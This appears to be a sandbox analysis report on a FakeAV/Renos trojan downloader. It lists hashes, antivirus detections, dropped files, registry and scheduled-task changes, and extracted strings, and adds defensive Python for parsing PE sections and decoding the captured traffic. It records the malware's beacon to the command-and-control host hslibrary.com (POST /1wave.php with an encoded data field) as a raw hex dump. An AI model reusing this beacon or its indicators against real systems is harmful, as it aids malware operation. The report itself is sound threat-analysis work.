Analysis Date: 2014-11-28 08:58:22
MD5: cb96986918ef9839d1aceeb1ea75bec6
SHA1: f5e5b79bcee2f1382cd2fcc8b6c9c962c195aadc

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 40cc407b59aba5d1f7efe482f6ee4cb1 sha1: b935cf4945da5c22db86e64d4ab6bf22e94cc76e size: 9728
Section .data md5: a7850f32f8d0e3ed860dc4d48fe10105 sha1: 7026393b4c50302cf56120788aa11b60a3930b27 size: 12288
Section .edata md5: 96b806485c1999d140487a191988b31c sha1: 386eac78e67f8cb259ed06133f18cc95cae23b53 size: 101888
Section .idata md5: 610eb458fd63528f54cb127a09b9f675 sha1: a333939388d1cfcf427bb0904eada150fcf8666f size: 3072
Section .bdata md5: c99a74c555371a433d121f551d6c6398 sha1: 605db3fdbaff4ba13729371ad0c4fbab3889378e size: 2048
Section .rsrc md5: bccf0365d71ae03b007bf451335b957a sha1: a9a147792f489fe8321d36a8d41552c589390cf9 size: 8704
Timestamp: 2009-08-26 00:13:48
Version:
LegalCopyright: Copyright © 2010 PC Tools. Hq All rights reserved. A
InternalName: OMoonY.exe
FileVersion: 3.0.0.612
CompanyName: videosoft
LegalTrademarks:
Comments:
ProductName: E Z
ProductVersion: 3.0.0.612
FileDescription: Video Component Setup
OriginalFilename: OMoonY.exe
PEhash: b51b30388f63934414ea3983eacc8b73ff0402ff
IMPhash: 46e072f11e3691ccda4a66cd2723b7ba
AV 360 Safe: Trojan.Generic.5860225
AV Ad-Aware: Trojan.Generic.5860225
AV Alwil (avast): MalOb-IJ [Cryp]
AV Arcabit (arcavir): Heur.W32
AV Authentium: W32/FakeAlert.NW.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen2
AV BullGuard: Trojan.Generic.5860225
AV CA (E-Trust Ino): Win32/Renos.D!generic
AV CAT (quickheal): Trojan.Renos.LN
AV ClamAV: Win.Trojan.Fakeav-3512
AV Dr. Web: Trojan.DownLoader2.50040
AV Emsisoft: Trojan.Generic.5860225
AV Eset (nod32): Win32/Kryptik.NKY
AV Fortinet: W32/Diple.IZ!tr
AV Frisk (f-prot): W32/FakeAlert.NW.gen!Eldorado
AV F-Secure: Packed:W32/TDSS.HZ
AV Grisoft (avg): no_virus
AV Ikarus: Trojan.Win32.Renos
AV K7: Trojan ( 002572691 )
AV Kaspersky: Trojan-FakeAV.Win32.FlashApp.st
AV MalwareBytes: Trojan.Downloader
AV Mcafee: Downloader-CEW.ar
AV Microsoft Security Essentials: TrojanDownloader:Win32/Renos.PT
AV MicroWorld (escan): Trojan.Generic.5860225
AV Rising: Trojan.Win32.Generic.1286FEDF
AV Sophos: Mal/FakeAV-IZ
AV Symantec: Trojan.FakeAV!gen52
AV Trend Micro: TROJ_AGENT.SMAH
AV VirusBlokAda (vba32): SScope.Trojan.ExpProc.019
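
The section hashes and Timestamp above are plain PE header fields and can be recomputed for any sample with the Python standard library alone. The following is an added example, not part of the report and not code from the sample; `build_minimal_pe` is a constructed test fixture, not a copy of this binary. Two things a triage analyst would check against these fields in this report: the compile TimeDateStamp (2009-08-26) is earlier than the "© 2010" in the version resource, so at least one of the two was not produced by the build that emitted the binary; and the .edata (export data) section is 101888 bytes against a .text of 9728, an unusual ratio for a GUI installer that, taken with the packer-oriented detection names above (TR/Crypt.XPACK.Gen2, Win32/Kryptik.NKY, Packed:W32/TDSS.HZ), suggests the section hashes describe a packer wrapper rather than the unpacked payload.

```python
"""Recompute the per-section MD5/SHA1/size and the compile timestamp that the report lists
under Static Details, with the standard library only. Added example, not from the report."""
import hashlib
import struct
from datetime import datetime, timezone

# Field layouts from the PE/COFF specification.
COFF_HEADER = "<HHIIIHH"    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
                            # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes)
SECTION_HEADER = "<8sIIII"  # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
                            # (first 24 of the 40-byte section header)

def _coff_offset(data: bytes) -> int:
    """Locate the COFF header via e_lfanew, validating both the MZ and PE signatures."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    return e_lfanew + 4

def pe_timestamp_utc(data: bytes) -> str:
    """TimeDateStamp as ISO-8601 UTC, the value the report shows as 'Timestamp'."""
    ts = struct.unpack_from(COFF_HEADER, data, _coff_offset(data))[2]
    return datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()

def pe_section_hashes(data: bytes) -> list[dict]:
    """One record per section: name, on-disk size, MD5 and SHA1 of the raw bytes."""
    coff = _coff_offset(data)
    header = struct.unpack_from(COFF_HEADER, data, coff)
    nsections, opt_size = header[1], header[5]
    table = coff + 20 + opt_size
    records = []
    for i in range(nsections):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from(SECTION_HEADER, data, table + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size]  # on-disk bytes only; a .bss-style section yields b""
        records.append({
            "name": name.rstrip(b"\0").decode("latin-1"),
            "size": raw_size,
            "md5": hashlib.md5(raw).hexdigest(),
            "sha1": hashlib.sha1(raw).hexdigest(),
            "truncated": len(raw) < raw_size,  # header promises more bytes than the file holds
        })
    return records

def build_minimal_pe(sections: list[tuple[bytes, bytes]], timestamp: int = 0) -> bytes:
    """Constructed fixture (not the analysed sample): MZ stub with e_lfanew=0x40, PE signature,
    COFF header, zeroed 224-byte optional header, one 40-byte header per (name, contents)
    pair, then the section contents back to back."""
    opt_size = 224
    first_raw = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    pe = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40))
    pe += b"PE\0\0" + struct.pack(COFF_HEADER, 0x14C, len(sections), timestamp, 0, 0, opt_size, 0x102)
    pe += b"\0" * opt_size
    body = bytearray()
    for name, contents in sections:
        pe += struct.pack(SECTION_HEADER, name, len(contents), 0x1000, len(contents), first_raw + len(body))
        pe += b"\0" * 16  # relocation and line-number fields plus Characteristics, unused here
        body += contents
    return bytes(pe + body)

if __name__ == "__main__":
    sample = build_minimal_pe([(b".text", b"\x55\x8b\xec" * 8), (b".rsrc", b"R" * 32)], timestamp=1251245628)
    print("Timestamp", pe_timestamp_utc(sample))
    for s in pe_section_hashes(sample):
        print(f"Section {s['name']} md5: {s['md5']} sha1: {s['sha1']} size: {s['size']}")
```

Pivoting on a section hash (here, for instance, the .rsrc MD5 bccf0365d71ae03b007bf451335b957a) pays off when that section is the one a packer leaves unchanged between builds; the `truncated` flag marks sections whose declared SizeOfRawData runs past the end of the file, which is how damaged or deliberately malformed samples tend to show up.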

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\WINDOWS\Ojawia.exe
Creates File: C:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates File: PIPE\lsarpc
Creates Process: C:\WINDOWS\Ojawia.exe
Creates Mutex: Global\{BC9BACEF-649A-45ff-A468-C000D051F283}

Process
↳ C:\WINDOWS\Ojawia.exe

Registry: HKEY_CURRENT_USER\Software\ICS5R7Y0OS\OhuD ➝ 5
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝ NULL
Creates File: C:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: Global\{BC9BACEF-649A-45ff-A468-C000D051F283}

Network Details:

DNS: keezmovies.com, Type: A ➝ 31.192.116.179
DNS: google.ro, Type: A ➝ 173.194.125.56
DNS: google.ro, Type: A ➝ 173.194.125.63
DNS: google.ro, Type: A ➝ 173.194.125.55
DNS: z5x.net, Type: A ➝ 62.128.56.34
DNS: hslibrary.com, Type: A ➝ 54.209.168.250
DNS: topsaj.com, Type: A
DNS: hawfruit.com, Type: A
HTTP POST: http://hslibrary.com/1wave.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 54.209.168.250:80

Raw Pcap
0x00000000 (00000)   504f5354 202f3177 6176652e 70687020   POST /1wave.php 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a43 6f6e7465 6e742d54   : */*..Content-T
0x00000030 (00048)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000040 (00064)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000050 (00080)   6e636f64 65640d0a 486f7374 3a206873   ncoded..Host: hs
0x00000060 (00096)   6c696272 6172792e 636f6d0d 0a557365   library.com..Use
0x00000070 (00112)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000080 (00128)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000090 (00144)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x000000a0 (00160)   6f777320 4e542035 2e30290d 0a436f6e   ows NT 5.0)..Con
0x000000b0 (00176)   74656e74 2d4c656e 6774683a 20333035   tent-Length: 305
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000d0 (00208)   6f73650d 0a436163 68652d43 6f6e7472   ose..Cache-Contr
0x000000e0 (00224)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x000000f0 (00240)   64617461 3d652f65 3672354a 5a523130   data=e/e6r5JZR10
0x00000100 (00256)   4669776f 474c6735 31516743 39686e62   FiwoGLg51QgC9hnb
0x00000110 (00272)   45786f32 31617433 614f5967 73552f48   Exo21at3aOYgsU/H
0x00000120 (00288)   4c6b7a66 33637577 70447452 7379352b   Lkzf3cuwpDtRsy5+
0x00000130 (00304)   65305a5a 5237336c 4558787a 39485464   e0ZZR73lEXxz9HTd
0x00000140 (00320)   54367833 30656463 7364774d 4a4f6441   T6x30edcsdwMJOdA
0x00000150 (00336)   462f566a 56735748 46304579 377a444a   F/VjVsWHF0Ey7zDJ
0x00000160 (00352)   57392f73 394a4572 4a307066 72383251   W9/s9JErJ0pfr82Q
0x00000170 (00368)   59366238 48436753 754e6155 71696734   Y6b8HCgSuNaUqig4
0x00000180 (00384)   6f563342 42774b32 74327a37 33524765   oV3BBwK2t2z73RGe
0x00000190 (00400)   7955446a 67737548 4670434c 4f696b52   yUDjgsuHFpCLOikR
0x000001a0 (00416)   50534c39 536a7550 31494238 624b706a   PSL9SjuP1IB8bKpj
0x000001b0 (00432)   746d4a30 69673356 6d566346 38616f4f   tmJ0ig3VmVcF8aoO
0x000001c0 (00448)   72425252 43796462 4b50674f 69452f6b   rBRRCydbKPgOiE/k
0x000001d0 (00464)   7a6a674d 76414543 6d564362 664b724e   zjgMvAECmVCbfKrN
0x000001e0 (00480)   6536576c 4867686b 45546a2f 6b477638   e6WlHghkETj/kGv8
0x000001f0 (00496)   46363055 52444d50 686e3470 64494144   F60URDMPhn4pdIAD
0x00000200 (00512)   71467842 482f3466 66384572 69676c32   qFxBH/4ff8Erigl2
0x00000210 (00528)   55597753 6c657234 48437838 32415a67   UYwSler4HCx82AZg
0x00000220 (00544)   46                                    F
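
The dump above is the complete request: the headers end at offset 240 and the body runs to offset 544, exactly the 305 bytes the Content-Length header declares, so the beacon was captured whole. The following added example, not part of the report and not code from the sample, decodes the report's hex-dump format back into bytes (checking that each line's offset agrees with the byte count so far, which catches a line dropped while copying), parses the request, and pulls the `data` field out without form-decoding it: a standard application/x-www-form-urlencoded decoder would turn the '+' at offset 0x12f into a space and break the base64. The 300-character value is valid base64 and decodes to 225 bytes; the report says nothing about how that content is protected, so the example measures its entropy rather than guessing at a cipher or key.

```python
"""Decode the report's raw-pcap hex dump back to bytes and take apart the POST to hslibrary.com.
Added example, not from the report; RAW_DUMP is the report's own 545 captured bytes, verbatim."""
import base64
import math
import re
from collections import Counter
RAW_DUMP = """\
0x00000000 (00000)   504f5354 202f3177 6176652e 70687020   POST /1wave.php
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a43 6f6e7465 6e742d54   : */*..Content-T
0x00000030 (00048)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000040 (00064)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000050 (00080)   6e636f64 65640d0a 486f7374 3a206873   ncoded..Host: hs
0x00000060 (00096)   6c696272 6172792e 636f6d0d 0a557365   library.com..Use
0x00000070 (00112)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000080 (00128)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000090 (00144)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x000000a0 (00160)   6f777320 4e542035 2e30290d 0a436f6e   ows NT 5.0)..Con
0x000000b0 (00176)   74656e74 2d4c656e 6774683a 20333035   tent-Length: 305
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000d0 (00208)   6f73650d 0a436163 68652d43 6f6e7472   ose..Cache-Contr
0x000000e0 (00224)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x000000f0 (00240)   64617461 3d652f65 3672354a 5a523130   data=e/e6r5JZR10
0x00000100 (00256)   4669776f 474c6735 31516743 39686e62   FiwoGLg51QgC9hnb
0x00000110 (00272)   45786f32 31617433 614f5967 73552f48   Exo21at3aOYgsU/H
0x00000120 (00288)   4c6b7a66 33637577 70447452 7379352b   Lkzf3cuwpDtRsy5+
0x00000130 (00304)   65305a5a 5237336c 4558787a 39485464   e0ZZR73lEXxz9HTd
0x00000140 (00320)   54367833 30656463 7364774d 4a4f6441   T6x30edcsdwMJOdA
0x00000150 (00336)   462f566a 56735748 46304579 377a444a   F/VjVsWHF0Ey7zDJ
0x00000160 (00352)   57392f73 394a4572 4a307066 72383251   W9/s9JErJ0pfr82Q
0x00000170 (00368)   59366238 48436753 754e6155 71696734   Y6b8HCgSuNaUqig4
0x00000180 (00384)   6f563342 42774b32 74327a37 33524765   oV3BBwK2t2z73RGe
0x00000190 (00400)   7955446a 67737548 4670434c 4f696b52   yUDjgsuHFpCLOikR
0x000001a0 (00416)   50534c39 536a7550 31494238 624b706a   PSL9SjuP1IB8bKpj
0x000001b0 (00432)   746d4a30 69673356 6d566346 38616f4f   tmJ0ig3VmVcF8aoO
0x000001c0 (00448)   72425252 43796462 4b50674f 69452f6b   rBRRCydbKPgOiE/k
0x000001d0 (00464)   7a6a674d 76414543 6d564362 664b724e   zjgMvAECmVCbfKrN
0x000001e0 (00480)   6536576c 4867686b 45546a2f 6b477638   e6WlHghkETj/kGv8
0x000001f0 (00496)   46363055 52444d50 686e3470 64494144   F60URDMPhn4pdIAD
0x00000200 (00512)   71467842 482f3466 66384572 69676c32   qFxBH/4ff8Erigl2
0x00000210 (00528)   55597753 6c657234 48437838 32415a67   UYwSler4HCx82AZg
0x00000220 (00544)   46                                    F
"""

LINE_RE = re.compile(r"^0x([0-9a-f]{8}) \((\d+)\)\s+(.*)$")
HEX_GROUP = re.compile(r"^[0-9a-f]{2,8}$")

def decode_dump(dump: str) -> bytes:
    """Rebuild the byte stream; both offsets on each line must equal the bytes collected so far."""
    out = bytearray()
    for line in dump.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        if int(m.group(1), 16) != len(out) or int(m.group(2)) != len(out):
            raise ValueError(f"offset mismatch at byte {len(out)}: {line!r}")
        # At most four hex groups precede the ASCII column, which may itself hold digit runs ("305").
        for tok in m.group(3).split()[:4]:
            if not HEX_GROUP.match(tok):
                break
            out += bytes.fromhex(tok)
    return bytes(out)

def parse_http_request(raw: bytes) -> dict:
    """Split request line, headers and body; flag whether the body matches Content-Length."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("end of headers not found; capture is truncated")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, path, _version = request_line.split(" ")
    headers = {k.strip().lower(): v.strip() for k, _, v in (h.partition(":") for h in header_lines)}
    declared = int(headers.get("content-length", "0"))
    return {"method": method, "path": path, "headers": headers, "body": body,
            "body_complete": declared == len(body)}

def raw_form_field(body: bytes, name: str) -> str:
    """Return the field verbatim; form decoding would turn the '+' at offset 0x12f into a space."""
    for pair in body.decode("latin-1").split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return value
    raise KeyError(name)

def shannon_entropy(data: bytes) -> float:
    """Bits per byte; values near 8.0 read as encrypted or compressed."""
    return -sum(c / len(data) * math.log2(c / len(data)) for c in Counter(data).values())

def analyse_beacon(dump: str = RAW_DUMP) -> dict:
    req = parse_http_request(decode_dump(dump))
    field = raw_form_field(req["body"], "data")
    payload = base64.b64decode(field, validate=True)  # raises on any byte outside the base64 alphabet
    return {"method": req["method"], "path": req["path"], "host": req["headers"]["host"],
            "user_agent": req["headers"]["user-agent"], "body_complete": req["body_complete"],
            "field_length": len(field), "payload_length": len(payload),
            "payload_entropy": round(shannon_entropy(payload), 2)}

if __name__ == "__main__":
    print(analyse_beacon())
```

Run as a script it prints the summary dict. The same `decode_dump` and `parse_http_request` pair rejects a dump with a dropped or repeated line, and `body_complete` turning False is the first sign that a beacon was only partly captured and that any decode of its body is working on truncated data.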


Strings
i.3.
..
@
.{.
...
.
.h.
..
E=3.
040904E4
 2010  PC Tools. Hq All rights reserved. A
3.0.0.612
7euM
9ugD
&About
Alt+
ANSI
ASCII
BBABORT
BBALL
BBCANCEL
BBCLOSE
BBHELP
BBIGNORE
BBNO
BBOK
BBRETRY
BBYES
BCD overflow
Big Endian Unicode
Comments
CompanyName
Copyright 
Ctrl+
Down
eo2iR
E&xit
&File
FileDescription
FileVersion
InternalName
Invalid owner=This control requires version 4.70 or greater of COMCTL32.DLL
Invalid SQL date/time values
LegalCopyright
LegalTrademarks
LError loading dock zone from the stream. Expecting version %d, but found %d.#No OnGetItem event handler assigned
MAINMENU
OMoonY.exe
&Open
OriginalFilename
PREVIEWGLYPH
ProductName
ProductVersion
Remote Login
Right
Shift+
%s is not a valid BCD value$Could not parse SQL TimeStamp string
StringFileInfo
Translation
U9t6
Unicode
UTF-7
UTF-8
VarFileInfo
Video Component Setup
videosoft
VS_VERSION_INFO
zfvn
1cT,H4]S
1fYo+z)E
>&1,Wu
|1zNf+
2""333:"C8
2""#33:DC8
2aWjWhHq
2$B""""C38
2C4"""D338
,2<d0OH[
@2$dDO(ZH
`2Hddt
2ldttX
_2r6uN2Oee@8
3:"""""
:33:"$
"*"$33
3333:"$
33333?
333333
333333?
3333333
$3333333
#3333333
33333333
33333333333
333333333333
333333333333?
33333333?333333
333333333333333
333333333333333333
3333333333333338
3333333:3333333383
333333:"33333338
3333333333338
33333:"$3333338
3333:"$3333338
3333339
333333:"C3333338
333333DDD3
333338
33333833
:*3:"$3338
#33338
33338?383
3333Dc3333333
3333f3333333?
3333fc33333338
3333>fd333338
3334JC33333338?333
3336Dc3333338
3336fC3333338
:*"*"$3338
333838
333*C33
333DDD33333?
333>fC333333
333>fd333333
$334B"$3
334C33333338
33B$3333333
33DDDDD3333
33fd3>fC333
33>ffffc338
34""C33333833
3B""$33333
$3q^%b
!\}3Srl
%3y*L<X40
4"*""C3338
; 4c%t
4DF334DC33
4=	Mw>SFs
4rUaVS
5D80C{)y
5q)LYR
;5qQt"hS
5%z0<4$
\6d4fV7
6 <F?!
'6_f95_
6SYGlpq
6?@&@~VXn
6XF+`{
7exWuME
7GP1-H
7Kmj21aKJ6Jg
7LO|[K
 8as-'dvzd
8Bw5pR
8cNH-g
8ePC29
/9P[:T]
a6 H4GZ_
AdjustWindowRectEx
ADVAPI32.dll
'"ak*s
	av+LS
aw?q(K4t
aXDs$^
#B3st(U
-b/]&4
B;5\6w
b6Hv^=
.B8Juj
@.bdata
BEI"P"D
BhCwUa
<!b\J4y
BOb_nDhu
BZ]wvH
:"C333
"$c33333
c333333
"C333333
C3333333
C33333833?33
"C3338
c33*C333
"C8338
c)buJ@
CharNextW
CharToOemA
CharUpperA
CheckMenuItem
ChildWindowFromPoint
cI^Ad~+
CjC338
CJharW
CloseClipboard
CreateMenu
CS%_T,
c\w8RTyd&
CY*>!r
`.data
"dc3333833
D*C33383
:DC33:""$8
!dc^*eVw
"DDB""$3
d?D_ftKoT
DefFrameProcA
DeleteCriticalSection
DestroyCursor
[dOew_
dR,~7j
DrawFrameControl
DrawIcon
DrawIconEx
`[@DUt
DwL2PdXr
DYG{ZgjF
E3#$YdlW
Eagvps
.edata
_efiA0z3mtd57J@16
egrfCKM
EmptyClipboard
EnableScrollBar
EndDialog
EnterCriticalSection
EnumChildWindows
EO[G8A7
EPo9tH)\ag
EqualRect
E^_[~t;
ExitProcess
E*YAzn8
`eyG<gE]
f2W$4~
,f35d^>oGD
fC333?3
fC33333
fDFfC338
F*F333383
fff3333
#\F'G7N
FillRect
$fKZj	
{^]fQp4
F,tN`xj
FU7dLz
fup/<JG
fU P`.rJdat
^'*?}g
G98\7654r\:\
gakC7hNp
gEAmGeEN
GetCurrentProcessId
GetDCEx
GetDesktopWindow
GetEnvironmentStrings
GetFileType
GetFocus
GetiPrXcAdk
GetKeyboardLayoutList
GetKeyboardState
GetMenu
GetMenuItemCount
GetMenuItemInfoA
GetMessagePos
GetModuleFileNameA
GetStdHandle
GetSysColorBrush
GetTickCount
GetTopWindow
GetVersionExA
GetWindowTextLengthA
GetWindowThreadProcessId
>#"g:FE
ggI6WN
gHjqurv
GlobalAddAtomA
GlobalAlloc
GlobalFindAtomA
_g;N1~
gs\w;&
GvFK0u4
h6(1M:26P
H$B}Jw
HeapAlloc
h>J%&{
^HlP^_
HObYAg9
\HtxGL^|
@.idata
ij:}r 
ip {_,9,
IsCharUpperA
IsDialogMessageA
IsWindowEnabled
ivX[Yd
Iw{/XY
"J333333
"J"C3333
jD?f9	
jJY3l|y
^_$JwU^
K2$lw$'$[
K3!-sv
KERNEL32.dll
/KL|yh
KRV f> ,
K)_TJFt
L^@2?Yua
>Lc;FP
lfr~SEHLW
lHTym5
LoadIconA
LoadKeyboardLayoutA
LoadLibraryA
LoadStringA
|$lQ@-
lstrcatA
lstrcmpiA
LtRUv	 
~^,@'M
main.cpl
MapWindowPoints
mJ07^@Z
mKH9y!
MoveWindow
MSVCDP60
`MtXQH
@#@MvK
mwT^l43
MwxCu6
+$*N/0
>{N7XF
nCl1vnPke
n>Ub,PW
n~w gGK
*:|O_6
^oKut_Jf
OMoonY.exe
OpenClipboard
ORB\1RJ	7
OSLEAUT5
oUAxHf
ow|:>-
ozroo~7
P01j~GWUNIQSTR
P24dTO8ZX
p2LdtOPZx
<pC4<q0
+p,DE3
PKDf. 
[pmAtp
p%Ng9|u
PRG%s_
(P$T R
PUd!!1
pv/FX4
pV+iBwOf7&
qb_Ov&3
_qCx@F
Qt0oP;Lg
Q~t$O,G6
(^QZ">
'r.6BBn
R8Jvdz1lrwE@8
r{!A=R
ReadFile
RegCreateKeyExA
RegisterClassA
RegOpenKeyExA
ReleaseCapture
ReleaseDC
RemoveMenu
RemovePropA
rj_IwDv[
R@Qm6t
rs[#D!
@.rsrc
s2\6A|
s4bF4^=oED
ScreenToClient
SD5CfY
s@dFHr
SendMessageW
SetActiveWindow
SetCapture
SetClassLongA
SetEndOfFile
SetErrorMode
SetEvent
SetPropA
SetScrollInfo
SetScrollRange
SetWindowsHookExA
sfbF4^oowJ
:SFJd_
ShowWindow
s%}JY;
sMbF4^Vo^D
S]v$/}
s\v}U~
SWbHXs
	|]sY:
_t?#`%
Tb<YF_^
Td^]ofD
t^g8]F
This program must be run under Win32
-TIckC
t|*.i>f
TIOS	X
t=n\+6"
tPdUDuJ7|
TrackPopupMenu
TranslateMessage
T|/\r_U
?T|Y`2?`
$@u] 2Y
U3qsl^%
uHGh1*
uhH@ejO_
_UlQ`k
uM'pYu(/
_ur<WCF7f9
USER32.dll
uw5b8wE
v\2]D`
V\'B/)
+<v EJ
Vg"7FD
VirtualAllocEx
VirtualFree
vP?20_
VpPp3h
Vq$2"q
VrUYVlQe
vVBK/;
VxZsionJ
WaitMessage
W{Apr 
;*we=9
,[wGW^
WindowFromPoint
wjXK65
W~<L&>
\!	WL8
 ~WL(FO
$wonJe
WP9R.[
W-u;`3
$X8Et|
xCQVXeMCD
XE8x/9D
/	xgSf6
+(,xhj{^(
XQQSPA+
x[_tqRx
xvn|A"h
y^:`^d
Y lj::p
'Yxt;u
~zD(7Q
$ZdrnQ;
_zF8Q4
\|Zr>vE
Z?VQ|u5@
Zw>;)2p
ZyTaXMX